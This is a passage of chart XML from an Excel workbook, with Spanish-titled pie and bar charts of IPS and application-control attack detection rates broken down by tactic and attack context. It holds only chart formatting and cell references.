                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% DETECCIÓN DE ATAQUES (IPS + APP-CTRL)</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:view3D>
      <c:rotX val="50"/>
      <c:perspective val="0"/>
    </c:view3D>
    <c:plotArea>
      <c:layout/>
      <c:pie3DChart>
        <c:varyColors val="1"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:dPt>
            <c:idx val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="4285F4"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="EA4335"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dLbls>
            <c:showLegendKey val="0"/>
            <c:showVal val="0"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
            <c:showLeaderLines val="1"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$EC$84:$EC$85</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados II - '!$ED$84:$ED$85</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
      </c:pie3DChart>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0" sz="2000">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart5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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% TIPOS DE DETECCIÓN &lt;100%</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:view3D>
      <c:rotX val="50"/>
      <c:perspective val="0"/>
    </c:view3D>
    <c:plotArea>
      <c:layout/>
      <c:pie3DChart>
        <c:varyColors val="1"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:dPt>
            <c:idx val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="4285F4"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="EA4335"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="2"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="FBBC04"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dLbls>
            <c:showLegendKey val="0"/>
            <c:showVal val="0"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
            <c:showLeaderLines val="1"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$EC$89:$EC$91</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados II - '!$ED$89:$ED$91</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
      </c:pie3DChart>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="1" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart54.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% DETECCIÓN EFICAZ ATAQUES (SÓLO TP)</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:view3D>
      <c:rotX val="50"/>
      <c:perspective val="0"/>
    </c:view3D>
    <c:plotArea>
      <c:layout/>
      <c:pie3DChart>
        <c:varyColors val="1"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:dPt>
            <c:idx val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="F1C232"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="EA4335"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dLbls>
            <c:showLegendKey val="0"/>
            <c:showVal val="0"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
            <c:showLeaderLines val="1"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$EO$26:$EO$27</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados II - '!$ER$26:$ER$27</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
      </c:pie3DChart>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart55.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% DETECCIÓN EFICAZ FLUJOS/ATAQUES (TP + COLATERAL)</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="38761D"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr/>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$EW$11:$EW$14</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados II - '!$EX$11:$EX$14</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="1443351471"/>
        <c:axId val="504856353"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="1443351471"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Nº Total de Flujos Eficaces Detectados</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="0"/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:spPr/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="504856353"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="504856353"/>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1501</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443351471"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart56.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% DETECCIÓN EFICAZ ATAQUES (SÓLO TP) / TÁCTICA</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$ER$8:$ER$9</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="F1C232"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$EO$10:$EO$24</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados II - '!$ER$10:$ER$24</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="746306539"/>
        <c:axId val="1111500581"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="746306539"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Táctica</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="0"/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:spPr/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="1111500581"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1111500581"/>
        <c:scaling>
          <c:orientation val="minMax"/>
          <c:max val="1.02"/>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Casos</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746306539"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart57.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>%  PROMEDIO DETECCIÓN EFICAZ FLUJOS/ATAQUES POR TÁCTICA (TP + Colateral)</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$EX$20</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="E06666"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dPt>
            <c:idx val="8"/>
          </c:dPt>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$EW$21:$EW$34</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados II - '!$EX$21:$EX$34</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$EY$20</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="38761D"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dPt>
            <c:idx val="8"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:ln cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:ln>
            </c:spPr>
          </c:dPt>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$EW$21:$EW$34</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados II - '!$EY$21:$EY$34</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="817730721"/>
        <c:axId val="773391733"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="817730721"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Táctica</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="0"/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:spPr/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="773391733"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="773391733"/>
        <c:scaling>
          <c:orientation val="minMax"/>
          <c:max val="1.02"/>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817730721"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart58.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% PROMEDIO DETECCIÓN EFICAZ FLUJOS/ATAQUES POR CONTEXTO DE ATAQUE (TP + Colateral)</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$FF$21</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="F1C232"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr/>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$FE$22:$FE$23</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados II - '!$FF$22:$FF$23</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$FG$21</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="38761D"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dPt>
            <c:idx val="0"/>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
          </c:dPt>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr/>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$FE$22:$FE$23</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados II - '!$FG$22:$FG$23</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="404290265"/>
        <c:axId val="870740403"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="404290265"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Contexto del Ataque</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="0"/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:spPr/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="870740403"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="870740403"/>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404290265"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart59.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% Promedio Detección Eficaz Ataques LV1 frente a Táctica</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$EY$37</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="38761D"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$EW$38:$EW$51</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados II - '!$EY$38:$EY$51</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="1530326384"/>
        <c:axId val="1040257713"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="1530326384"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Táctica</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="0"/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:spPr/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="1040257713"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1040257713"/>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Promedio Detección Eficaz Ataques LV1</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530326384"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart60.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% Promedio Detección Eficaz Ataques LV2 frente a Táctica</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$FA$37</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="38761D"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dPt>
            <c:idx val="9"/>
          </c:dPt>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$EW$38:$EW$51</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados II - '!$FA$38:$FA$51</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="1528589153"/>
        <c:axId val="576736558"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="1528589153"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Táctica</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
